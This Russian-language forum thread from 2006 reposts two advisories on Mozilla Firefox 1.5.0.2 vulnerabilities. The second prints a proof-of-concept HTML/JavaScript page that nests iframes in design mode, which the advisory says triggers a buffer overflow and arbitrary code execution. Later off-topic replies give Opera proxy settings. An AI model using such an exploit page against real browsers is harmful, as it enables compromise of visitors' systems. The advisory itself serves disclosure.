Множественные уязвимости в Mozilla Firefox

update:
Не успела выйти последняя версия популярного браузера Mozilla Firefox (1.5.0.2), как тут же сообщили о наличии уязвимости в этом браузере. Как указывается в описании, обычно Вэб-сайты не ссылаются на локальные (с точки зрения посетителя) ресурсы. Однако наличие уязвимости может позволить получить доступ к лоакльному файлу, открываемому в браузере, при помощи URI типа file:. Для этого необходимо заманить посетителя на специальным образом сформированную страницу и убедить при нажатии на правую кнопку мыши выбрать "View Image" на рисунке, который он не видит. Так как на настоящий момент патча не существует, рекомендуется не пользоваться этой "особенностью".
Опубликовано: 18.04.2006
http://www.fssr.ru/hz.php?name=News&file=article&sid=5896

 

25 апреля, 2006
Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.

Опасность: Критическая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:

Code:

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea> 
  <script> 
       var textarea = document.getElementsByName("x_OtherInfo"); 
       textarea=textarea.item(0); 
           var htmlarea = document.createElement("div"); 
       htmlarea.className = "htmlarea";  
       textarea.parentNode.insertBefore(htmlarea, textarea); 
       var iframe = document.createElement("iframe"); 
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document; 
                 doc.designMode = "on"; 
                 doc.open(); 
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus() 
  doc.close(); 
  </script>
</textarea>

http://www.securitylab.ru/vulnerability/266229.php

 

в Operе я прокси немогу поставить,как не пытался уже...могеть подскажешь?

 

Macroeject

Tools-->Preferences-->Advanced-->Network-->Proxy Servers

Потом Tools-->Quick Preferences-->Enable Proxy Servers

 

а терь по русски Инструменты-->Быстрая настройка-->Включить прокси сервера
Ввобщем качаеш прогу hide ip platinum запускаеш она находит проксик а потом делаеш выше сказаное и все=)

 

а теперь по французки:

Les instruments-> les Préférences-> Avancé-> le Réseau-> les Serveurs Par procuration Ïî ò î ì Les instruments-> les Préférences Rapides-> Permettent aux Serveurs Par procuration